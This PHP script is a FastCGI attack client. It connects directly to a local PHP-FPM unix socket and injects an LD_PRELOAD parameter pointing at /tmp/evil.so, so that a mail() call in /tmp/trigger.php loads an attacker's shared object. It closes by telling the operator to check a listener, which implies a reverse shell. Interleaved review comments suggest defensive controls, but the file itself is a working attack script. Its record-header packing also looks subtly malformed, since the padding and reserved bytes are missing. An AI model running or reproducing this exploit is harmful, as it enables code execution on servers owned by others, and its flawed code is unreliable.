<?php
// FastCGI client that connects straight to a local PHP FastCGI socket and
// places an LD_PRELOAD entry in the request parameters (mail() abuse).
// Indicators visible in this file: a unix socket under /tmp, a PHP script
// under /tmp, and a shared object under /tmp named in the parameter list.

// FastCGI record types and role used by this client.
const FCGI_BEGIN_REQUEST = 1;
const FCGI_PARAMS = 4;
const FCGI_STDIN = 5;
const FCGI_RESPONDER = 1;

// Unix socket of the PHP FastCGI backend this client connects to.
$socketFile = '/tmp/php-cgi-73.sock';
// Script the backend is asked to execute; per the original note it calls mail().
$scriptFile = '/tmp/trigger.php';
/**
 * Serialise one record for the FastCGI stream.
 *
 * The result is pack('CCnn') of the version (fixed at 1), the record type,
 * the request id and the content byte length, followed by the content and
 * by enough NUL bytes to round the content length up to a multiple of eight.
 *
 * @param int    $type      Record type, e.g. FCGI_PARAMS.
 * @param string $content   Raw record body.
 * @param int    $requestId Request id written into the header.
 * @return string The encoded record.
 */
function fcgi_packet($type, $content, $requestId = 1) {
    $bodyLength = strlen($content);
    $padBytes = (8 - ($bodyLength % 8)) % 8;
    $header = pack('CCnn', 1, $type, $requestId, $bodyLength);

    return $header . $content . str_repeat("\0", $padBytes);
}
// Open the backend's unix socket directly, bypassing the web server front end.
// The 30 is the connect timeout in seconds; on failure the script exits with $errstr.
// NOTE(review): this step succeeds only if the calling account is allowed to
// connect to the socket. Restricting the socket's owner/group/mode to the web
// server account (for PHP-FPM pools: listen.owner / listen.group / listen.mode)
// is the control that applies here.
$socket = stream_socket_client('unix://' . $socketFile, $errno, $errstr, 30);
if (!$socket) die("Socket connection failed: $errstr\n");
$requestId = 1;
// Begin request: role FCGI_RESPONDER followed by five zero bytes.
$content = pack('nC5', FCGI_RESPONDER, 0, 0, 0, 0, 0);
fwrite($socket, fcgi_packet(FCGI_BEGIN_REQUEST, $content, $requestId));
// Request parameters. The client, not a web server, chooses every value here,
// including SCRIPT_FILENAME and an LD_PRELOAD entry.
// NOTE(review): a normal front end would not be expected to send a
// SCRIPT_FILENAME under /tmp or an LD_PRELOAD parameter; both are reasonable
// things to alert on, along with new .so/.php files in world-writable
// directories. Confirm against the environment's baseline.
$params = [
'SCRIPT_FILENAME' => $scriptFile,
'REQUEST_METHOD' => 'GET',
'QUERY_STRING' => '',
'CONTENT_TYPE' => '',
'CONTENT_LENGTH' => '0',
'SCRIPT_NAME' => '/trigger.php',
'REQUEST_URI' => '/trigger.php',
'DOCUMENT_ROOT' => '/',
'LD_PRELOAD' => '/tmp/evil.so', // attacker-supplied shared object (per the original author's note)
// Remaining entries identify the client and the gateway interface.
'SERVER_SOFTWARE' => 'PHP FastCGI Client',
'GATEWAY_INTERFACE' => 'CGI/1.1',
];
// Encode each pair as: one length byte for the name, one length byte for the
// value, then the name bytes and the value bytes.
$paramContent = '';
foreach ($params as $name => $value) {
$nameLen = strlen($name);
$valueLen = strlen($value);
$paramContent .= pack('C', $nameLen) . pack('C', $valueLen) . $name . $value;
}
fwrite($socket, fcgi_packet(FCGI_PARAMS, $paramContent, $requestId));
fwrite($socket, fcgi_packet(FCGI_PARAMS, '', $requestId)); // empty PARAMS record ends the parameter stream
// Empty STDIN record: the request carries no body.
fwrite($socket, fcgi_packet(FCGI_STDIN, '', $requestId));
// Drain the response: read 8 bytes, unpack them as a record header, skip the
// content and padding, and stop on record type 3 or on a short read.
while (!feof($socket)) {
$header = fread($socket, 8);
if (strlen($header) < 8) break;
$data = unpack('Cversion/Ctype/nrequestId/ncontentLength/CpaddingLength/Creserved', $header);
fread($socket, $data['contentLength']);
fread($socket, $data['paddingLength']);
if ($data['type'] == 3) break; // FCGI_END_REQUEST
}
fclose($socket);
// NOTE(review): the message below implies the operator expects a connection
// back from the host, so unexpected outbound connections from the PHP worker
// account are a further detection point. This is inferred from the wording only.
echo "Request sent. Check your listener!\n";
?>